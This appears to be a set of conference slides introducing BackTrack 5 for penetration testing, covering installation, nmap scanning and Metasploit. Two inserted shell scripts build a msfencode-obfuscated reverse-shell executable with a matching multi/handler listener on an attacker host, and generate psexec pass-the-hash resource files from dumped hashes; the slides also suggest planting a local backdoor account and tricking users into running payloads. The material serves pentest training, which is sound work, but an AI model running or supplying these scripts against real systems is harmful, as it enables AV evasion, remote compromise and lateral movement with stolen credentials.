What is BackTrack?
Based on the Ubuntu GNU/Linux distribution
Designed for penetration testing and forensics
Large collection of security-related tools, ranging from port scanners to password crackers
LiveCD distribution, bootable from DVD or USB
Developed and maintained by the team at Offensive Security
Current version is BackTrack 5 R2 (kernel updated 02/24/12, ISO updated 03/01/12)
Free, and always will be!
Persistent Installation
This step is optional
As easy as clicking the "Install BackTrack" desktop icon and following the prompts
Can be installed on the entire disk as the primary OS
Can be installed alongside another OS in a dual-boot configuration
Can be run as a virtual guest
Recommendations
Now that we have a persistent installation, change the default root password (the well-known default is "toor") with passwd
Also take this opportunity to fix the WICD D-Bus error that BackTrack 5 ships with (re-run dpkg-reconfigure for wicd and re-add its init script with update-rc.d)
Type reboot from a terminal window
Log in with the root account and the new password
Enter startx to launch the GUI
Tools
The number of tools available can be intimidating
The tools alone are not an end in themselves
They are logically grouped by primary function
What matters is how they fit into tactics and strategy (a pentest methodology)
Scanning
The more information we gather, the greater the chance of success
Identify live hosts
Identify the OS
Identify services, grab banners
Check for vulnerabilities
Tool of choice: NMAP
Metasploit
Free online course (Metasploit Unleashed) from the gang at Offensive Security (thanks guys, this is awesome!)
Does it all: it can scan, check for vulnerabilities, create your own payloads and deliver them
msfconsole is where the sessions on compromised hosts are managed
Maintaining Access
If you can get a user to run a payload for you, there is no need to go through the trouble of exploiting any software (SET, the Social-Engineer Toolkit, automates exactly this)
Payloads can be encoded (msfencode) to help bypass signature-based AV software; encoding is no guarantee, so test the result against the target's AV where you can
Reverse Shell
Append O to the msfpayload command to display the available options (LHOST, LPORT, ...) for the selected payload; set them, then generate the payload
Now that the payload is ready to go, we use exploit/multi/handler to catch the connection from a payload launched outside the Metasploit framework
The multi/handler has to be told what payload to expect, so we configure it with the same PAYLOAD, LHOST and LPORT that the payload was generated with
Now that everything is prepared, we launch the attack with exploit; the multi/handler catches the callback and we have a reverse shell session on the remote host
What access level does Jim have?
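The payload/handler pairing described above, written out as an added example (this script is not from the original slides or from Offensive Security). It assumes the BackTrack 5 era tools msfpayload, msfencode and msfconsole, and uses placeholder values for the attacker address (192.168.1.10) and port (4444). The point it makes is the one the slides insist on: the handler's PAYLOAD, LHOST and LPORT must equal the values the payload was built with, and handler_matches checks a resource file for exactly that before you start waiting for a callback.

```shell
#!/bin/sh
# Added example, not part of the original slides: build the msfpayload/msfencode
# command for a reverse shell and a matching multi/handler resource file.
# Assumptions: BackTrack 5 era Metasploit (msfpayload/msfencode/msfconsole);
# 192.168.1.10 and 4444 are placeholder attacker values, override via environment.

PAYLOAD="${PAYLOAD:-windows/meterpreter/reverse_tcp}"
LHOST="${LHOST:-192.168.1.10}"
LPORT="${LPORT:-4444}"

# Print the payload-generation pipeline. 'R' asks msfpayload for raw output so
# msfencode can encode it (shikata_ga_nai, 5 passes) and wrap it in an .exe.
payload_cmd() {
    printf '%s\n' "msfpayload $PAYLOAD LHOST=$LHOST LPORT=$LPORT R | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o payload.exe"
}

# Print an msfconsole resource file for multi/handler using the same settings.
# ExitOnSession false + exploit -j -z keep the handler listening for more callbacks.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
set ExitOnSession false
exploit -j -z
EOF
}

# Check that a resource file's PAYLOAD/LHOST/LPORT match what the payload was
# built with. Prints "ok", or the first mismatch and returns 1.
handler_matches() {
    rcfile="$1"
    for key in PAYLOAD LHOST LPORT; do
        eval "want=\"\$$key\""
        got=$(awk -v k="$key" '$1 == "set" && $2 == k { print $3 }' "$rcfile")
        if [ "$got" != "$want" ]; then
            echo "mismatch: $key is '$got' in $rcfile but the payload was built with '$want'"
            return 1
        fi
    done
    echo ok
}
```

Usage: source the script, run `handler_rc > handler.rc`, run the command printed by `payload_cmd` to produce payload.exe, confirm `handler_matches handler.rc` prints ok, then start the listener with `msfconsole -r handler.rc` before the payload is delivered.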
Moving on
With a reverse shell connection we have the same privilege level as Jim (hope he is a local admin)
Let's create a local user with our own password, just for fun
The fun continues: we can now scan additional hosts and services from Jim's workstation
What level of access does Jim have on other workstations? Dump the local password hashes and reuse them as-is (pass the hash); any host where the same local account and password exist is open to us without ever cracking a hash
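The pass-the-hash step, as an added example (not from the original slides): take one line of meterpreter hashdump output and turn it into a psexec resource file, since psexec's SMBPass accepts LM:NTLM in place of a cleartext password. The hashdump line is constructed for this example (the NTLM half is the hash of "password", the LM half is the empty-LM marker); 192.168.1.20 and 192.168.1.10 are placeholder target and attacker addresses.

```shell
#!/bin/sh
# Added example, not part of the original slides: pass the hash with Metasploit's psexec.
# Assumptions: hashdump output in the form user:rid:LM:NTLM:::, placeholder addresses.

# Constructed sample hashdump line (NTLM of "password", empty-LM marker for LM).
SAMPLE_HASHDUMP='jim:1001:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::'

# Print "user LM:NTLM" from a hashdump line; fail unless both hashes are 32 hex chars,
# which catches truncated or mangled lines before they go into a resource file.
parse_hashdump() {
    line="$1"
    user=${line%%:*}
    lm=$(printf '%s' "$line" | cut -d: -f3)
    nt=$(printf '%s' "$line" | cut -d: -f4)
    case "$lm" in *[!0-9a-fA-F]*|"") return 1;; esac
    case "$nt" in *[!0-9a-fA-F]*|"") return 1;; esac
    [ ${#lm} -eq 32 ] && [ ${#nt} -eq 32 ] || return 1
    printf '%s %s:%s\n' "$user" "$lm" "$nt"
}

# Print a psexec resource file: $1 = hashdump line, $2 = target (RHOST), $3 = our LHOST.
# SMBPass is given the LM:NTLM pair; no password is ever cracked.
psexec_rc() {
    creds=$(parse_hashdump "$1") || return 1
    user=${creds%% *}
    hash=${creds#* }
    cat <<EOF
use exploit/windows/smb/psexec
set RHOST $2
set SMBUser $user
set SMBPass $hash
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $3
set LPORT 4444
exploit
EOF
}
```

Usage: in the meterpreter session on Jim's workstation run hashdump, paste the line for the account you want to reuse into `psexec_rc '<line>' <target> <your ip> > pth.rc`, then `msfconsole -r pth.rc`. A session back from the target answers the slide's question about Jim's access elsewhere.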
Additional Resources
www.offensive-security.com
Metasploit Unleashed (free online course)
www.backtrack-linux.org
http://www.exploit-db.com/
http://www.exploit-db.com/google-dorks/
http://www.offensive-security.com/penetrationtesting-sample-report.pdf
www.thehask.com
Halifax Hack Lab (speak to Travis Barlow)
Conclusion
Have basic Unix command-line skills (try Kubuntu)
Take your time
Pick a few tools and learn them well
This is a continual process; you will always be learning
You have not failed until you stop trying
Many thanks to the team at Offensive Security for being the first educational sponsor of The Atlantic Security Conference
Questions?